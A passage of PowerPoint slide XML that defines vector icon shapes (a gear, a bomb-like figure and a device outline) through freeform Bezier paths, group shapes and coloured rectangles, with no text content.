                <a:gd name="T77" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T78" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T79" fmla="*/ 0 h 58"/>
                <a:gd name="T80" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T81" fmla="*/ 0 h 58"/>
                <a:gd name="T82" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T83" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T84" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T85" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T86" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T87" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T88" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T89" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T90" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T91" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T92" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T93" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T94" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T95" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T96" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T97" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T98" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T99" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T100" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T101" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T102" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T103" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T104" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T105" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T106" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T107" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T108" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T109" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T110" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T111" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T112" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T113" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T114" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T115" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T116" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T117" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T118" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T119" fmla="*/ 2147483646 h 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58">
                  <a:moveTo>
                    <a:pt x="58" y="33"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="34"/>
                    <a:pt x="58" y="34"/>
                    <a:pt x="57" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="35"/>
                    <a:pt x="50" y="35"/>
                    <a:pt x="50" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="37"/>
                    <a:pt x="49" y="38"/>
                    <a:pt x="49" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="41"/>
                    <a:pt x="51" y="42"/>
                    <a:pt x="53" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="44"/>
                    <a:pt x="53" y="45"/>
                    <a:pt x="53" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="45"/>
                    <a:pt x="53" y="46"/>
                    <a:pt x="53" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="47"/>
                    <a:pt x="47" y="53"/>
                    <a:pt x="45" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="53"/>
                    <a:pt x="45" y="53"/>
                    <a:pt x="44" y="52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38" y="49"/>
                    <a:pt x="37" y="49"/>
                    <a:pt x="36" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="52"/>
                    <a:pt x="35" y="55"/>
                    <a:pt x="34" y="57"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="57"/>
                    <a:pt x="34" y="58"/>
                    <a:pt x="33" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="58"/>
                    <a:pt x="25" y="58"/>
                    <a:pt x="25" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="58"/>
                    <a:pt x="23" y="57"/>
                    <a:pt x="23" y="57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1" y="49"/>
                    <a:pt x="20" y="49"/>
                    <a:pt x="19" y="48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2" y="53"/>
                    <a:pt x="12" y="53"/>
                    <a:pt x="12" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="50"/>
                    <a:pt x="7" y="48"/>
                    <a:pt x="5" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="46"/>
                    <a:pt x="5" y="45"/>
                    <a:pt x="5" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="45"/>
                    <a:pt x="5" y="44"/>
                    <a:pt x="5" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="42"/>
                    <a:pt x="8" y="41"/>
                    <a:pt x="9" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="38"/>
                    <a:pt x="8" y="37"/>
                    <a:pt x="8" y="35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0" y="34"/>
                    <a:pt x="0" y="33"/>
                    <a:pt x="0" y="3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3"/>
                    <a:pt x="1" y="23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1"/>
                    <a:pt x="9" y="20"/>
                    <a:pt x="9" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="17"/>
                    <a:pt x="7" y="15"/>
                    <a:pt x="5" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="13"/>
                    <a:pt x="5" y="13"/>
                    <a:pt x="5" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="12"/>
                    <a:pt x="5" y="12"/>
                    <a:pt x="5" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="10"/>
                    <a:pt x="11" y="5"/>
                    <a:pt x="13" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="5"/>
                    <a:pt x="13" y="5"/>
                    <a:pt x="14" y="5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0" y="9"/>
                    <a:pt x="21" y="8"/>
                    <a:pt x="22" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="5"/>
                    <a:pt x="23" y="3"/>
                    <a:pt x="23" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="0"/>
                    <a:pt x="24" y="0"/>
                    <a:pt x="25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4" y="0"/>
                    <a:pt x="34" y="1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7" y="8"/>
                    <a:pt x="38" y="9"/>
                    <a:pt x="39" y="9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8" y="7"/>
                    <a:pt x="51" y="9"/>
                    <a:pt x="52" y="12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3"/>
                    <a:pt x="53" y="13"/>
                    <a:pt x="52" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="15"/>
                    <a:pt x="50" y="17"/>
                    <a:pt x="48" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="20"/>
                    <a:pt x="50" y="21"/>
                    <a:pt x="50" y="22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8" y="23"/>
                    <a:pt x="58" y="24"/>
                    <a:pt x="58" y="25"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="58" y="33"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="29" y="19"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="19"/>
                    <a:pt x="19" y="23"/>
                    <a:pt x="19" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="34"/>
                    <a:pt x="24" y="38"/>
                    <a:pt x="29" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="38"/>
                    <a:pt x="39" y="34"/>
                    <a:pt x="39" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="23"/>
                    <a:pt x="34" y="19"/>
                    <a:pt x="29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217"/>
              <a:endParaRPr lang="en-IN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5721760" y="2591383"/>
            <a:ext cx="1028700" cy="1028700"/>
            <a:chOff x="11163300" y="3963566"/>
            <a:chExt cx="2057400" cy="2057400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11163300" y="3963566"/>
              <a:ext cx="2057400" cy="2057400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217"/>
              <a:endParaRPr lang="en-US" sz="36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59" name="Freeform 157"/>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1" noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="11655853" y="4496222"/>
              <a:ext cx="1072294" cy="1072301"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T1" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T2" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T3" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T4" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T5" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T6" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T7" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T8" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T9" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T10" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T11" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T12" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T13" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T14" fmla="*/ 0 w 68"/>
                <a:gd name="T15" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T16" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T17" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T18" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T19" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T20" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T21" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T22" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T23" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T24" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T25" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T26" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T27" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T28" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T29" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T30" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T31" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T32" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T33" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T34" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T35" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T36" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T37" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T38" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T39" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T40" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T41" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T42" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T43" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T44" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T45" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T46" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T47" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T48" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T49" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T50" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T51" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T52" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T53" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T54" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T55" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T56" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T57" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T58" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T59" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T60" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T61" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T62" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T63" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T64" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T65" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T66" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T67" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T68" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T69" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T70" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T71" fmla="*/ 0 h 68"/>
                <a:gd name="T72" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T73" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T74" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T75" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T76" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T77" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T78" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T79" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T80" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T81" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T82" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T83" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T84" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T85" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T86" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T87" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T88" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T89" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T90" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T91" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T92" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T93" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T94" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T95" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T96" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T97" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T98" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T99" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T100" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T101" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T102" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T103" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T104" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T105" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T106" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T107" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T108" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T109" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T110" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T111" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T112" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T113" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T114" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T115" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T116" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T117" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T118" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T119" fmla="*/ 2147483646 h 68"/>
                <a:gd name="T120" fmla="*/ 2147483646 w 68"/>
                <a:gd name="T121" fmla="*/ 2147483646 h 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8" h="68">
                  <a:moveTo>
                    <a:pt x="59" y="10"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="20"/>
                    <a:pt x="50" y="20"/>
                    <a:pt x="50" y="20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3" y="23"/>
                    <a:pt x="53" y="25"/>
                    <a:pt x="52" y="26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2" y="32"/>
                    <a:pt x="53" y="36"/>
                    <a:pt x="53" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="56"/>
                    <a:pt x="41" y="68"/>
                    <a:pt x="26" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="68"/>
                    <a:pt x="0" y="56"/>
                    <a:pt x="0" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="26"/>
                    <a:pt x="12" y="14"/>
                    <a:pt x="26" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="14"/>
                    <a:pt x="36" y="16"/>
                    <a:pt x="40" y="18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3" y="14"/>
                    <a:pt x="44" y="14"/>
                    <a:pt x="45" y="15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57" y="9"/>
                    <a:pt x="57" y="9"/>
                    <a:pt x="57" y="9"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="59" y="10"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="18" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="23"/>
                    <a:pt x="8" y="27"/>
                    <a:pt x="6" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="34"/>
                    <a:pt x="6" y="35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9" y="36"/>
                    <a:pt x="10" y="36"/>
                    <a:pt x="11" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="30"/>
                    <a:pt x="16" y="27"/>
                    <a:pt x="20" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="25"/>
                    <a:pt x="22" y="23"/>
                    <a:pt x="21" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="21"/>
                    <a:pt x="20" y="20"/>
                    <a:pt x="18" y="21"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="57" y="7"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="7"/>
                    <a:pt x="56" y="7"/>
                    <a:pt x="56" y="6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2"/>
                    <a:pt x="52" y="2"/>
                    <a:pt x="52" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="1"/>
                    <a:pt x="54" y="1"/>
                    <a:pt x="54" y="1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5"/>
                    <a:pt x="58" y="6"/>
                    <a:pt x="58" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="7"/>
                    <a:pt x="57" y="7"/>
                    <a:pt x="57" y="7"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="61" y="5"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="5"/>
                    <a:pt x="60" y="6"/>
                    <a:pt x="59" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="6"/>
                    <a:pt x="58" y="5"/>
                    <a:pt x="58" y="5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0"/>
                    <a:pt x="59" y="0"/>
                    <a:pt x="59" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="60" y="0"/>
                    <a:pt x="61" y="0"/>
                    <a:pt x="61" y="1"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="61" y="5"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="63" y="6"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="7"/>
                    <a:pt x="62" y="7"/>
                    <a:pt x="62" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="7"/>
                    <a:pt x="61" y="7"/>
                    <a:pt x="61" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="6"/>
                    <a:pt x="61" y="5"/>
                    <a:pt x="61" y="5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5" y="1"/>
                    <a:pt x="66" y="1"/>
                    <a:pt x="66" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="2"/>
                    <a:pt x="67" y="2"/>
                    <a:pt x="66" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="63" y="6"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="65" y="15"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="15"/>
                    <a:pt x="65" y="15"/>
                    <a:pt x="64" y="15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1"/>
                    <a:pt x="61" y="10"/>
                    <a:pt x="61" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="9"/>
                    <a:pt x="62" y="9"/>
                    <a:pt x="63" y="10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67" y="14"/>
                    <a:pt x="67" y="15"/>
                    <a:pt x="66" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="15"/>
                    <a:pt x="66" y="15"/>
                    <a:pt x="65" y="15"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="67" y="9"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="9"/>
                    <a:pt x="63" y="9"/>
                    <a:pt x="63" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="9"/>
                    <a:pt x="62" y="9"/>
                    <a:pt x="62" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="8"/>
                    <a:pt x="62" y="7"/>
                    <a:pt x="63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7" y="7"/>
                    <a:pt x="68" y="8"/>
                    <a:pt x="68" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="9"/>
                    <a:pt x="67" y="9"/>
                    <a:pt x="67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914217"/>
              <a:endParaRPr lang="en-IN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10317012" y="2591383"/>
            <a:ext cx="1028700" cy="1028700"/>
            <a:chOff x="19572140" y="3963566"/>
            <a:chExt cx="2057400" cy="2057400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rectangle 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="19572140" y="3963566"/>
              <a:ext cx="2057400" cy="2057400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent5"/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217"/>
              <a:endParaRPr lang="en-US" sz="3600" dirty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pSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="61" name="Group 60"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks noChangeAspect="1"/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="20211999" y="4484707"/>
              <a:ext cx="777680" cy="1127335"/>
              <a:chOff x="3922713" y="2541588"/>
              <a:chExt cx="204788" cy="296863"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="62" name="Rectangle 72"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3957638" y="2616200"/>
                <a:ext cx="130175" cy="10953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914217">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US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63" name="Rectangle 73"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3995738" y="2578100"/>
                <a:ext cx="57150" cy="2063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914217">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US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64" name="Freeform 74"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3922713" y="2541588"/>
                <a:ext cx="204788" cy="296863"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="65" y="0"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="14" y="0"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="0" y="14"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="0" y="102"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="14" y="116"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="65" y="116"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="80" y="102"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="80" y="14"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="65" y="0"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="73" y="102"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="65" y="109"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="14" y="109"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="7" y="102"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="7" y="14"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="14" y="7"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="65" y="7"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="73" y="14"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="73" y="102"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="80" h="116">
                    <a:moveTo>
                      <a:pt x="65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0" y="110"/>
                      <a:pt x="6" y="116"/>
                      <a:pt x="14" y="116"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="116"/>
                      <a:pt x="65" y="116"/>
                      <a:pt x="65" y="116"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="116"/>
                      <a:pt x="80" y="110"/>
                      <a:pt x="80" y="102"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="14"/>
                      <a:pt x="80" y="14"/>
                      <a:pt x="80" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="6"/>
                      <a:pt x="73" y="0"/>
                      <a:pt x="65" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="102"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="106"/>
                      <a:pt x="69" y="109"/>
                      <a:pt x="65" y="109"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="109"/>
                      <a:pt x="14" y="109"/>
                      <a:pt x="14" y="109"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="109"/>
                      <a:pt x="7" y="106"/>
                      <a:pt x="7" y="102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0"/>
                      <a:pt x="10" y="7"/>
                      <a:pt x="14" y="7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9" y="7"/>
                      <a:pt x="73" y="10"/>
                      <a:pt x="73" y="14"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="73" y="10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914217">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US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65" name="Rectangle 75"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3957638" y="2782888"/>
                <a:ext cx="20638" cy="2063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914217">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US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66" name="Rectangle 76"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
